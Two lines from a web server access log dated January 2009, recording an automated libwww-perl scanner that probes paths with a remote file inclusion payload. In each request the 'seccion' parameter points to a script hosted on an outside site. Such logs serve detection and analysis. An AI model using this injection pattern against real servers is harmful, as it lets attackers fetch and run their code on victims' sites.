216.40.204.130 - - [06/Jan/2009:08:28:04 -0800] "GET /logs/access_080504.log//index.php?seccion=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
216.40.204.130 - - [06/Jan/2009:08:28:04 -0800] "GET /logs//index.php?seccion=http://www.vijayawadakanakadurga.com//language/idv6.txt??%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.dmulk.com"
